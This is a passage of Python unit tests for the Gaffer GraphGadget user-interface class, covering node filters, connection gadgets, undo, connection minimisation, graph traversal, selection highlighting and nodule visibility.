    self.assertTrue( g.nodeGadget( script["add2"] ) )
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    c = g.connectionGadget( script["add2"]["op1"] )
    self.assertTrue( c )
    self.assertIsNone( c.srcNodule() )
def testConnectingHiddenSrcNodesAndReshowing( self ) :
    """Un-hiding the source of a dangling connection restores its src nodule."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    c = g.connectionGadget( script["add2"]["op1"] )
    self.assertTrue( c )
    self.assertIsNone( c.srcNodule() )
    nodeFilter.add( script["add1"] )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    c = g.connectionGadget( script["add2"]["op1"] )
    self.assertTrue( c )
    self.assertTrue( c.srcNodule().plug().isSame( script["add1"]["sum"] ) )
def testChangingFilter( self ) :
    """setFilter() swaps the active node filter."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    nodeFilter2 = Gaffer.StandardSet( [ script["add2"] ] )
    g.setFilter( nodeFilter2 )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
def testChangingFilterAndEditingOriginal( self ) :
    """Edits to a replaced filter must have no effect on the gadget."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    nodeFilter = Gaffer.StandardSet()
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    nodeFilter2 = Gaffer.StandardSet( [ script["add2"] ] )
    g.setFilter( nodeFilter2 )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    # editing the old, disconnected filter changes nothing
    nodeFilter.add( script["add1"] )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
def testConnectionsForNestedPlugs( self ) :
    """Connections between nested (compound) plugs follow show/hide of either end."""
    script = Gaffer.ScriptNode()
    script["n"] = NestedPlugTestNode()
    script["n"]["c"] = Gaffer.Plug()
    script["n"]["c"]["i"] = Gaffer.IntPlug()
    script["n2"] = NestedPlugTestNode()
    script["n2"]["c"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
    script["n2"]["c"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
    script["n"]["c"]["i"].setInput( script["n2"]["c"]["o"] )
    s = Gaffer.StandardSet( script.children() )
    g = GafferUI.GraphGadget( script, s )
    c = g.connectionGadget( script["n"]["c"]["i"] )
    self.assertTrue( c )
    self.assertTrue( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
    self.assertTrue( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
    # hide the source node: connection dangles
    s.remove( script["n2"] )
    self.assertIsNone( g.nodeGadget( script["n2"] ) )
    c = g.connectionGadget( script["n"]["c"]["i"] )
    self.assertTrue( c )
    self.assertIsNone( c.srcNodule() )
    self.assertTrue( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
    # show it again: src nodule comes back
    s.add( script["n2"] )
    self.assertTrue( g.nodeGadget( script["n2"] ) )
    c = g.connectionGadget( script["n"]["c"]["i"] )
    self.assertTrue( c )
    self.assertTrue( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
    self.assertTrue( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
    # hide the destination node: connection disappears entirely
    s.remove( script["n"] )
    self.assertIsNone( g.nodeGadget( script["n"] ) )
    self.assertIsNone( g.connectionGadget( script["n"]["c"]["i"] ) )
    s.add( script["n"] )
    self.assertTrue( g.nodeGadget( script["n"] ) )
    c = g.connectionGadget( script["n"]["c"]["i"] )
    self.assertTrue( c )
    self.assertTrue( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
    self.assertTrue( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
def testRemovePlugWithInputConnection( self ) :
    """Removing a destination plug removes the connection; undo restores it."""
    script = Gaffer.ScriptNode()
    script["n1"] = Gaffer.Node()
    script["n2"] = Gaffer.Node()
    script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
    script["n2"]["i"] = Gaffer.IntPlug()
    script["n2"]["i"].setInput( script["n1"]["o"] )
    g = GafferUI.GraphGadget( script )
    self.assertTrue( g.connectionGadget( script["n2"]["i"] ) is not None )
    with Gaffer.UndoScope( script ) :
        removedPlug = script["n2"]["i"]
        del script["n2"]["i"]
    self.assertTrue( g.connectionGadget( removedPlug ) is None )
    script.undo()
    self.assertTrue( g.connectionGadget( script["n2"]["i"] ) is not None )
def testRemovePlugWithOutputConnection( self ) :
    """Removing a source plug removes the connection; undo restores it."""
    script = Gaffer.ScriptNode()
    script["n1"] = Gaffer.Node()
    script["n2"] = Gaffer.Node()
    script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
    script["n2"]["i"] = Gaffer.IntPlug()
    script["n2"]["i"].setInput( script["n1"]["o"] )
    g = GafferUI.GraphGadget( script )
    self.assertTrue( g.connectionGadget( script["n2"]["i"] ) is not None )
    with Gaffer.UndoScope( script ) :
        del script["n1"]["o"]
    self.assertTrue( g.connectionGadget( script["n2"]["i"] ) is None )
    script.undo()
    self.assertTrue( g.connectionGadget( script["n2"]["i"] ) is not None )
def testConnectionBound( self ) :
    """A connection's bound is non-empty and lies within the padded node bounds.

    Repeated 100 times because node layout positions can vary run to run.
    """
    for i in range( 0, 100 ) :
        script = Gaffer.ScriptNode()
        script["n1"] = Gaffer.Node()
        script["n2"] = Gaffer.Node()
        script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
        script["n2"]["i"] = Gaffer.IntPlug()
        script["n2"]["i"].setInput( script["n1"]["o"] )
        g = GafferUI.GraphGadget( script )
        c = g.connectionGadget( script["n2"]["i"] )
        gb = imath.Box3f()
        gb.extendBy( g.nodeGadget( script["n1"] ).bound() )
        gb.extendBy( g.nodeGadget( script["n2"] ).bound() )
        gb.setMin( gb.min() - imath.V3f( 10 ) )
        gb.setMax( gb.max() + imath.V3f( 10 ) )
        b = c.bound()
        self.assertFalse( b.isEmpty() )
        self.assertTrue( IECore.BoxAlgo.contains( gb, b ) )
def testNoFilter( self ) :
    """With no filter, the graph shows the whole script."""
    script = Gaffer.ScriptNode()
    script["n1"] = Gaffer.Node()
    gadget = GafferUI.GraphGadget( script )
    self.assertTrue( gadget.getRoot().isSame( script ) )
    self.assertTrue( gadget.getFilter() is None )
    self.assertTrue( gadget.nodeGadget( script["n1"] ) )
    script["n2"] = Gaffer.Node()
    # NOTE(review): re-checks n1 after adding n2 -- possibly meant to
    # check n2; behaviour preserved as-is
    self.assertTrue( gadget.nodeGadget( script["n1"] ) )
def testFilterIsChildSet( self ) :
    """A ChildSet filter automatically shows newly added nodes."""
    s = Gaffer.ScriptNode()
    s["n1"] = Gaffer.Node()
    g = GafferUI.GraphGadget( s, Gaffer.ChildSet( s ) )
    self.assertTrue( g.nodeGadget( s["n1"] ) )
    l = len( g )
    s["n2"] = Gaffer.Node()
    self.assertTrue( g.nodeGadget( s["n2"] ) )
    # exactly one child gadget was added for the new node
    self.assertEqual( len( g ), l + 1 )
def testSetRoot( self ) :
    """setRoot() re-homes the gadget and discards the previous filter."""
    s = Gaffer.ScriptNode()
    s["b"] = Gaffer.Box()
    s["b"]["n"] = Gaffer.Node()
    f = Gaffer.StandardSet( [ s["b"] ] )
    g = GafferUI.GraphGadget( s, f )
    self.assertTrue( g.nodeGadget( s["b"] ) )
    self.assertFalse( g.nodeGadget( s["b"]["n"] ) )
    g.setRoot( s["b"] )
    self.assertTrue( g.getRoot().isSame( s["b"] ) )
    # the old filter does not apply to the new root
    self.assertEqual( g.getFilter(), None )
    self.assertTrue( g.nodeGadget( s["b"]["n"] ) )
    self.assertFalse( g.nodeGadget( s["b"] ) )
def testRootChangedSignal( self ) :
    """rootChangedSignal() fires once per actual change, with the previous root."""
    s = Gaffer.ScriptNode()
    s["b"] = Gaffer.Box()
    roots = []
    previousRoots = []
    def f( gg, previousRoot ) :
        self.assertTrue( gg.isSame( g ) )
        roots.append( gg.getRoot() )
        previousRoots.append( previousRoot )
    g = GafferUI.GraphGadget( s )
    c = g.rootChangedSignal().connect( f )
    self.assertEqual( len( roots ), 0 )
    self.assertEqual( len( previousRoots ), 0 )
    g.setRoot( s["b"] )
    self.assertEqual( len( roots ), 1 )
    self.assertTrue( roots[0].isSame( s["b"] ) )
    self.assertEqual( len( previousRoots ), 1 )
    self.assertTrue( previousRoots[0].isSame( s ) )
    # setting the same root again must not re-signal
    g.setRoot( s["b"] )
    self.assertEqual( len( roots ), 1 )
    self.assertTrue( roots[0].isSame( s["b"] ) )
    self.assertEqual( len( previousRoots ), 1 )
    self.assertTrue( previousRoots[0].isSame( s ) )
    g.setRoot( s )
    self.assertEqual( len( roots ), 2 )
    self.assertTrue( roots[1].isSame( s ) )
    self.assertEqual( len( previousRoots ), 2 )
    self.assertTrue( previousRoots[1].isSame( s["b"] ) )
def testSetNodePosition( self ) :
    """setNodePosition() stores a position retrievable via getNodePosition()."""
    script = Gaffer.ScriptNode()
    script["n"] = Gaffer.Node()
    graphGadget = GafferUI.GraphGadget( script )
    self.assertFalse( graphGadget.hasNodePosition( script["n"] ) )
    position = imath.V2f( -100, 2000 )
    graphGadget.setNodePosition( script["n"], position )
    self.assertEqual( graphGadget.getNodePosition( script["n"] ), position )
    self.assertTrue( graphGadget.hasNodePosition( script["n"] ) )
def testPlugConnectionGadgets( self ) :
    """connectionGadgets( plug ) lists outgoing connections, honouring
    excludedNodes."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    script["add3"] = GafferTest.AddNode()
    script["add4"] = GafferTest.AddNode()
    # add1 -> add2 -> (add3, add4)
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    script["add3"]["op1"].setInput( script["add2"]["sum"] )
    script["add4"]["op2"].setInput( script["add2"]["sum"] )
    g = GafferUI.GraphGadget( script )
    c = g.connectionGadgets( script["add1"]["sum"] )
    self.assertEqual( len( c ), 1 )
    self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
    self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
    # excluding the only destination yields no connections
    c = g.connectionGadgets( script["add1"]["sum"], excludedNodes = Gaffer.StandardSet( [ script["add2"] ] ) )
    self.assertEqual( len( c ), 0 )
    c = g.connectionGadgets( script["add2"]["sum"] )
    self.assertEqual( len( c ), 2 )
    self.assertTrue( c[0].srcNodule().plug().isSame( script["add2"]["sum"] ) )
    self.assertTrue( c[0].dstNodule().plug().isSame( script["add3"]["op1"] ) )
    self.assertTrue( c[1].srcNodule().plug().isSame( script["add2"]["sum"] ) )
    self.assertTrue( c[1].dstNodule().plug().isSame( script["add4"]["op2"] ) )
    c = g.connectionGadgets( script["add2"]["sum"], excludedNodes = Gaffer.StandardSet( [ script["add3"] ] ) )
    self.assertEqual( len( c ), 1 )
    self.assertTrue( c[0].srcNodule().plug().isSame( script["add2"]["sum"] ) )
    self.assertTrue( c[0].dstNodule().plug().isSame( script["add4"]["op2"] ) )
def testNodeConnectionGadgets( self ) :

	"""connectionGadgets( node ) must list connections at either end of the
	node, honouring the excludedNodes argument."""

	script = Gaffer.ScriptNode()
	for name in ( "add1", "add2", "add3", "add4" ) :
		script[name] = GafferTest.AddNode()

	script["add2"]["op1"].setInput( script["add1"]["sum"] )
	script["add3"]["op1"].setInput( script["add2"]["sum"] )
	script["add4"]["op2"].setInput( script["add2"]["sum"] )

	g = GafferUI.GraphGadget( script )

	def assertConnections( connections, expected ) :
		# `expected` is an ordered sequence of ( srcPlug, dstPlug ) pairs.
		self.assertEqual( len( connections ), len( expected ) )
		for connection, ( srcPlug, dstPlug ) in zip( connections, expected ) :
			self.assertTrue( connection.srcNodule().plug().isSame( srcPlug ) )
			self.assertTrue( connection.dstNodule().plug().isSame( dstPlug ) )

	assertConnections(
		g.connectionGadgets( script["add1"] ),
		[ ( script["add1"]["sum"], script["add2"]["op1"] ) ],
	)

	assertConnections(
		g.connectionGadgets( script["add1"], excludedNodes = Gaffer.StandardSet( [ script["add2"] ] ) ),
		[],
	)

	assertConnections(
		g.connectionGadgets( script["add2"] ),
		[
			( script["add1"]["sum"], script["add2"]["op1"] ),
			( script["add2"]["sum"], script["add3"]["op1"] ),
			( script["add2"]["sum"], script["add4"]["op2"] ),
		],
	)

	assertConnections(
		g.connectionGadgets( script["add2"], excludedNodes = Gaffer.StandardSet( [ script["add3"] ] ) ),
		[
			( script["add1"]["sum"], script["add2"]["op1"] ),
			( script["add2"]["sum"], script["add4"]["op2"] ),
		],
	)
def testInternalConnectionsNotShown( self ) :

	"""Connections internal to a single node must never get a
	ConnectionGadget, whether made before or after the GraphGadget exists."""

	def assertNotVisualised( graph, node ) :
		self.assertEqual( len( graph.connectionGadgets( node ) ), 0 )
		for plugName in ( "sum", "op1", "op2" ) :
			self.assertIsNone( graph.connectionGadget( node[plugName] ) )

	# Internal connections that exist before graph visualisation.
	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add1"]["sum"].setInput( script["add1"]["op1"] )
	script["add1"]["op1"].setInput( script["add1"]["op2"] )

	g = GafferUI.GraphGadget( script )
	assertNotVisualised( g, script["add1"] )

	# Internal connections made after graph visualisation.
	script = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( script )
	script["add1"] = GafferTest.AddNode()
	script["add1"]["sum"].setInput( script["add1"]["op1"] )
	script["add1"]["op1"].setInput( script["add1"]["op2"] )

	assertNotVisualised( g, script["add1"] )
def testConnectionMinimisedAccessors( self ) :

	"""The per-node input/output connection minimisation flags must default
	to False and round-trip through their set/get accessors independently."""

	script = Gaffer.ScriptNode()
	for name in ( "add1", "add2", "add3" ) :
		script[name] = GafferTest.AddNode()

	script["add2"]["op1"].setInput( script["add1"]["sum"] )
	script["add3"]["op1"].setInput( script["add2"]["sum"] )

	g = GafferUI.GraphGadget( script )

	def assertMinimised( inputStates, outputStates ) :
		# Expected flags for ( add1, add2, add3 ), inputs then outputs.
		for name, expected in zip( ( "add1", "add2", "add3" ), inputStates ) :
			self.assertEqual( g.getNodeInputConnectionsMinimised( script[name] ), expected )
		for name, expected in zip( ( "add1", "add2", "add3" ), outputStates ) :
			self.assertEqual( g.getNodeOutputConnectionsMinimised( script[name] ), expected )

	assertMinimised( ( False, False, False ), ( False, False, False ) )

	g.setNodeInputConnectionsMinimised( script["add3"], True )
	assertMinimised( ( False, False, True ), ( False, False, False ) )

	g.setNodeOutputConnectionsMinimised( script["add2"], True )
	assertMinimised( ( False, False, True ), ( False, True, False ) )

	g.setNodeOutputConnectionsMinimised( script["add2"], False )
	assertMinimised( ( False, False, True ), ( False, False, False ) )

	g.setNodeInputConnectionsMinimised( script["add3"], False )
	assertMinimised( ( False, False, False ), ( False, False, False ) )
def testConnectionMinimisation( self ) :

	"""Connections created while an endpoint node is minimised must be
	created minimised, and must track later minimisation changes."""

	script = Gaffer.ScriptNode()
	for name in ( "add1", "add2", "add3" ) :
		script[name] = GafferTest.AddNode()

	g = GafferUI.GraphGadget( script )
	g.setNodeOutputConnectionsMinimised( script["add1"], True )

	script["add2"]["op1"].setInput( script["add1"]["sum"] )
	minimisedConnection = g.connectionGadget( script["add2"]["op1"] )
	self.assertTrue( minimisedConnection.getMinimised() )

	script["add3"]["op1"].setInput( script["add2"]["sum"] )
	normalConnection = g.connectionGadget( script["add3"]["op1"] )
	self.assertFalse( normalConnection.getMinimised() )

	# Minimised at both ends - still minimised.
	g.setNodeInputConnectionsMinimised( script["add2"], True )
	self.assertTrue( minimisedConnection.getMinimised() )
	self.assertFalse( normalConnection.getMinimised() )

	# Still minimised at the destination end only.
	g.setNodeOutputConnectionsMinimised( script["add1"], False )
	self.assertTrue( minimisedConnection.getMinimised() )
	self.assertFalse( normalConnection.getMinimised() )

	# Not minimised at either end any more.
	g.setNodeInputConnectionsMinimised( script["add2"], False )
	self.assertFalse( minimisedConnection.getMinimised() )
	self.assertFalse( normalConnection.getMinimised() )
def testNodeGadgetCreatorReturningNull( self ) :

	"""A registered gadget creator returning None hides the node and its
	connections without affecting its computations."""

	class InvisibleNode( GafferTest.AddNode ) :

		def __init__( self, name = "InvisibleNode" ) :

			GafferTest.AddNode.__init__( self, name )

	IECore.registerRunTimeTyped( InvisibleNode )
	GafferUI.NodeGadget.registerNodeGadget( InvisibleNode, lambda node : None )

	script = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( script )

	script["n1"] = InvisibleNode()
	script["n2"] = InvisibleNode()

	self.assertIsNone( g.nodeGadget( script["n1"] ) )
	self.assertIsNone( g.nodeGadget( script["n2"] ) )

	script["n2"]["op1"].setInput( script["n1"]["sum"] )
	self.assertIsNone( g.connectionGadget( script["n2"]["op1"] ) )

	# In case it wasn't clear, hiding the nodes has zero
	# effect on their computations.
	script["n1"]["op1"].setValue( 12 )
	script["n1"]["op2"].setValue( 13 )
	script["n2"]["op2"].setValue( 100 )
	self.assertEqual( script["n2"]["sum"].getValue(), 125 )
def testUpstreamNodeGadgets( self ) :

	"""upstreamNodeGadgets() must traverse input connections, honouring
	degreesOfSeparation and skipping filtered (invisible) nodes."""

	script = Gaffer.ScriptNode()

	# a -> b -> c -> e -> f
	#           ^
	#           |
	#           d

	for name in ( "a", "b", "c", "d", "e", "f" ) :
		script[name] = GafferTest.AddNode()

	script["b"]["op1"].setInput( script["a"]["sum"] )
	script["c"]["op1"].setInput( script["b"]["sum"] )
	script["c"]["op2"].setInput( script["d"]["sum"] )
	script["e"]["op1"].setInput( script["c"]["sum"] )
	script["f"]["op1"].setInput( script["e"]["sum"] )

	g = GafferUI.GraphGadget( script )

	def upstreamNames( node, **kw ) :
		return [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( node, **kw ) ]

	u = upstreamNames( script["c"] )
	self.assertEqual( len( u ), 3 )
	self.assertEqual( set( u ), { "a", "b", "d" } )

	u = upstreamNames( script["f"] )
	self.assertEqual( len( u ), 5 )
	self.assertEqual( set( u ), { "a", "b", "d", "c", "e" } )

	# The degreesOfSeparation argument should limit the depth of the search.
	u = upstreamNames( script["c"], degreesOfSeparation = 1 )
	self.assertEqual( len( u ), 2 )
	self.assertEqual( set( u ), { "b", "d" } )

	# Filtered nodes should be ignored.
	g.setFilter( Gaffer.StandardSet( [ script["f"], script["e"], script["a"] ] ) )
	self.assertEqual( upstreamNames( script["f"] ), [ "e" ] )
def testDownstreamNodeGadgets( self ) :

	"""downstreamNodeGadgets() must traverse output connections, honouring
	degreesOfSeparation."""

	script = Gaffer.ScriptNode()

	# a -> b -> c -> e -> f
	#           |
	#           v
	#           d

	for name in ( "a", "b", "c", "d", "e", "f" ) :
		script[name] = GafferTest.AddNode()

	script["b"]["op1"].setInput( script["a"]["sum"] )
	script["c"]["op1"].setInput( script["b"]["sum"] )
	script["d"]["op1"].setInput( script["c"]["sum"] )
	script["e"]["op1"].setInput( script["c"]["sum"] )
	script["f"]["op1"].setInput( script["e"]["sum"] )

	g = GafferUI.GraphGadget( script )

	def downstreamNames( node, **kw ) :
		return [ x.node().relativeName( script ) for x in g.downstreamNodeGadgets( node, **kw ) ]

	u = downstreamNames( script["b"] )
	self.assertEqual( len( u ), 4 )
	self.assertEqual( set( u ), { "c", "d", "e", "f" } )

	u = downstreamNames( script["e"] )
	self.assertEqual( len( u ), 1 )
	self.assertEqual( set( u ), { "f" } )

	# degreesOfSeparation limits the depth of the search.
	u = downstreamNames( script["c"], degreesOfSeparation = 1 )
	self.assertEqual( len( u ), 2 )
	self.assertEqual( set( u ), { "d", "e" } )
def testConnectedNodeGadgets( self ) :

	"""connectedNodeGadgets() must traverse in both or one direction,
	honour degreesOfSeparation, and skip filtered (invisible) nodes."""

	script = Gaffer.ScriptNode()

	# a -> b -> c -> e -> f
	#           |
	#           v
	#           d

	for name in ( "a", "b", "c", "d", "e", "f" ) :
		script[name] = GafferTest.AddNode()

	script["b"]["op1"].setInput( script["a"]["sum"] )
	script["c"]["op1"].setInput( script["b"]["sum"] )
	script["d"]["op1"].setInput( script["c"]["sum"] )
	script["e"]["op1"].setInput( script["c"]["sum"] )
	script["f"]["op1"].setInput( script["e"]["sum"] )

	g = GafferUI.GraphGadget( script )

	def connectedNames( node, **kw ) :
		return { x.node().relativeName( script ) for x in g.connectedNodeGadgets( node, **kw ) }

	# Traversal in both directions.
	self.assertEqual( connectedNames( script["b"] ), { "a", "c", "d", "e", "f" } )
	self.assertEqual( connectedNames( script["e"] ), { "a", "b", "c", "d", "f" } )
	self.assertEqual( connectedNames( script["c"], degreesOfSeparation = 1 ), { "b", "d", "e" } )

	# Traversal upstream only.
	self.assertEqual( connectedNames( script["c"], direction = Gaffer.Plug.Direction.In ), { "a", "b" } )
	self.assertEqual( connectedNames( script["c"], direction = Gaffer.Plug.Direction.In, degreesOfSeparation = 1 ), { "b" } )

	# Traversal downstream only.
	self.assertEqual( connectedNames( script["c"], direction = Gaffer.Plug.Direction.Out ), { "d", "e", "f" } )
	self.assertEqual( connectedNames( script["c"], direction = Gaffer.Plug.Direction.Out, degreesOfSeparation = 1 ), { "d", "e" } )

	# Invisible (filtered out) nodes are ignored.
	g.setFilter( Gaffer.StandardSet( [ script["f"], script["e"], script["c"] ] ) )
	self.assertEqual( connectedNames( script["e"] ), { "f", "c" } )
	self.assertEqual( connectedNames( script["e"], direction = Gaffer.Plug.Direction.In ), { "c" } )
	self.assertEqual( connectedNames( script["e"], direction = Gaffer.Plug.Direction.Out ), { "f" } )
def testSelectionHighlighting( self ) :

	"""NodeGadgets must be highlighted exactly when their node is in the
	script selection, tracking add(), remove() and clear()."""

	script = Gaffer.ScriptNode()
	script["a"] = GafferTest.AddNode()
	script["b"] = GafferTest.AddNode()

	# Select before the gadget exists - the initial state must reflect it.
	script.selection().add( script["a"] )

	g = GafferUI.GraphGadget( script )

	def assertHighlighted( a, b ) :
		self.assertEqual( g.nodeGadget( script["a"] ).getHighlighted(), a )
		self.assertEqual( g.nodeGadget( script["b"] ).getHighlighted(), b )

	assertHighlighted( True, False )

	script.selection().add( script["b"] )
	assertHighlighted( True, True )

	script.selection().remove( script["a"] )
	assertHighlighted( False, True )

	script.selection().clear()
	assertHighlighted( False, False )
def testNoDuplicatePositionPlugsAfterPasting( self ) :

	"""Duplicating a node that already carries a __uiPosition plug must not
	create a second, suffixed position plug on the copy."""

	script = Gaffer.ScriptNode()
	script["n"] = Gaffer.Node()

	g = GafferUI.GraphGadget( script )
	g.setNodePosition( script["n"], imath.V2f( 1, 2 ) )
	self.assertTrue( g.hasNodePosition( script["n"] ) )

	# Serialise the node and paste it back; the copy arrives as "n1".
	script.execute( script.serialise( script, Gaffer.StandardSet( [ script["n"] ] ) ) )

	self.assertIn( "__uiPosition", script["n1"] )
	self.assertNotIn( "__uiPosition1", script["n1"] )
def testErrorAndDelete( self ) :

	"""Deleting a node after it has errored on a background thread must not
	leave idle callbacks poking at a dead NodeGadget."""

	# A script with a deliberately broken node, and a GraphGadget
	# displaying it.
	script = Gaffer.ScriptNode()
	script["n"] = GafferTest.BadNode()
	graphGadget = GafferUI.GraphGadget( script )

	# Arrange for the node to error on a background thread.
	def triggerError() :
		with IECore.IgnoredExceptions( Exception ) :
			script["n"]["out1"].getValue()

	backgroundThread = threading.Thread( target = triggerError )
	backgroundThread.start()
	backgroundThread.join()

	# Delete the node on the foreground thread - this removes the
	# NodeGadget inside the GraphGadget.
	del script["n"]

	# Run idle events. Woe betide any NodeGadget implementation assuming
	# it will still be alive at arbitrary points in the future!
	self.waitForIdle( 1000 )
def testMovePlugWithInputConnection( self ) :

	"""When a connected destination plug is reparented onto another node,
	the connection gadget must follow it to the new node."""

	script = Gaffer.ScriptNode()

	script["n1"] = Gaffer.Node()
	script["n1"]["p"] = Gaffer.Plug()
	script["n2"] = Gaffer.Node()
	script["n2"]["p"] = Gaffer.Plug()
	script["n2"]["p"].setInput( script["n1"]["p"] )

	g = GafferUI.GraphGadget( script )

	# Move the connected plug from n2 onto a brand new node n3.
	script["n3"] = Gaffer.Node()
	script["n3"]["p"] = script["n2"]["p"]

	connection = g.connectionGadget( script["n3"]["p"] )
	srcNodule = connection.srcNodule()
	dstNodule = connection.dstNodule()

	self.assertTrue( dstNodule.plug().isSame( script["n3"]["p"] ) )
	self.assertTrue( srcNodule.plug().isSame( script["n1"]["p"] ) )

	self.assertTrue( g.nodeGadget( script["n1"] ).isAncestorOf( srcNodule ) )
	self.assertTrue( g.nodeGadget( script["n3"] ).isAncestorOf( dstNodule ) )
def testMovePlugWithInputConnectionOutsideGraph( self ) :

	"""Reparenting a connected plug onto a node outside the script must
	remove its connection gadget from the graph."""

	script = Gaffer.ScriptNode()

	script["n1"] = Gaffer.Node()
	script["n1"]["p"] = Gaffer.Plug()
	script["n2"] = Gaffer.Node()
	script["n2"]["p"] = Gaffer.Plug()
	script["n2"]["p"].setInput( script["n1"]["p"] )

	g = GafferUI.GraphGadget( script )

	# Move the plug onto a node that isn't in the script at all.
	orphan = Gaffer.Node()
	orphan["p"] = script["n2"]["p"]

	self.assertIsNone( g.connectionGadget( orphan["p"] ) )
def testRemoveNoduleWithInputConnection( self ) :

	"""Hiding a destination plug's nodule via metadata must also remove its
	connection gadget."""

	script = Gaffer.ScriptNode()

	script["n1"] = Gaffer.Node()
	script["n1"]["p"] = Gaffer.Plug()
	script["n2"] = Gaffer.Node()
	script["n2"]["p"] = Gaffer.Plug()
	script["n2"]["p"].setInput( script["n1"]["p"] )

	g = GafferUI.GraphGadget( script )

	self.assertIsNotNone( g.nodeGadget( script["n2"] ).nodule( script["n2"]["p"] ) )
	self.assertIsNotNone( g.connectionGadget( script["n2"]["p"] ) )

	# An empty "nodule:type" hides the nodule.
	Gaffer.Metadata.registerValue( script["n2"]["p"], "nodule:type", "" )

	self.assertIsNone( g.nodeGadget( script["n2"] ).nodule( script["n2"]["p"] ) )
	self.assertIsNone( g.connectionGadget( script["n2"]["p"] ) )
def testRemoveNoduleWithOutputConnections( self ) :

	"""Hiding a source plug's nodule keeps the connection gadget alive but
	with a null srcNodule(); restoring the nodule reattaches it."""

	script = Gaffer.ScriptNode()

	script["n1"] = Gaffer.Node()
	script["n1"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
	script["n2"] = Gaffer.Node()
	script["n2"]["in"] = Gaffer.Plug()
	script["n2"]["in"].setInput( script["n1"]["out"] )

	g = GafferUI.GraphGadget( script )

	def assertConnection( srcVisible ) :
		connection = g.connectionGadget( script["n2"]["in"] )
		self.assertIsNotNone( connection )
		if srcVisible :
			self.assertTrue( connection.srcNodule().plug().isSame( script["n1"]["out"] ) )
		else :
			self.assertIsNone( connection.srcNodule() )
		self.assertTrue( connection.dstNodule().plug().isSame( script["n2"]["in"] ) )

	assertConnection( srcVisible = True )

	Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "" )
	assertConnection( srcVisible = False )

	Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "GafferUI::StandardNodule" )
	assertConnection( srcVisible = True )
def testAddNoduleWithInputConnection( self ) :

	"""Restoring a hidden nodule for an *internal* connection must recreate
	the nodule but still show no connection gadget."""

	script = Gaffer.ScriptNode()
	script["n"] = Gaffer.Node()
	script["n"]["in"] = Gaffer.Plug()
	script["n"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
	script["n"]["out"].setInput( script["n"]["in"] )

	Gaffer.Metadata.registerValue( script["n"]["out"], "nodule:type", "" )

	g = GafferUI.GraphGadget( script )
	self.assertIsNone( g.nodeGadget( script["n"] ).nodule( script["n"]["out"] ) )
	self.assertIsNone( g.connectionGadget( script["n"]["out"] ) )

	Gaffer.Metadata.registerValue( script["n"]["out"], "nodule:type", "GafferUI::StandardNodule" )
	self.assertIsNotNone( g.nodeGadget( script["n"] ).nodule( script["n"]["out"] ) )
	# Internal connections never get a gadget, even with the nodule back.
	self.assertIsNone( g.connectionGadget( script["n"]["out"] ) )
def testAddNoduleWithOutputConnection( self ) :

	"""Restoring a hidden source nodule must reattach it as the existing
	connection gadget's srcNodule()."""

	script = Gaffer.ScriptNode()
	script["n1"] = Gaffer.Node()
	script["n1"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
	script["n2"] = Gaffer.Node()
	script["n2"]["in"] = Gaffer.Plug()
	script["n2"]["in"].setInput( script["n1"]["out"] )

	Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "" )

	g = GafferUI.GraphGadget( script )
	self.assertIsNone( g.nodeGadget( script["n1"] ).nodule( script["n1"]["out"] ) )
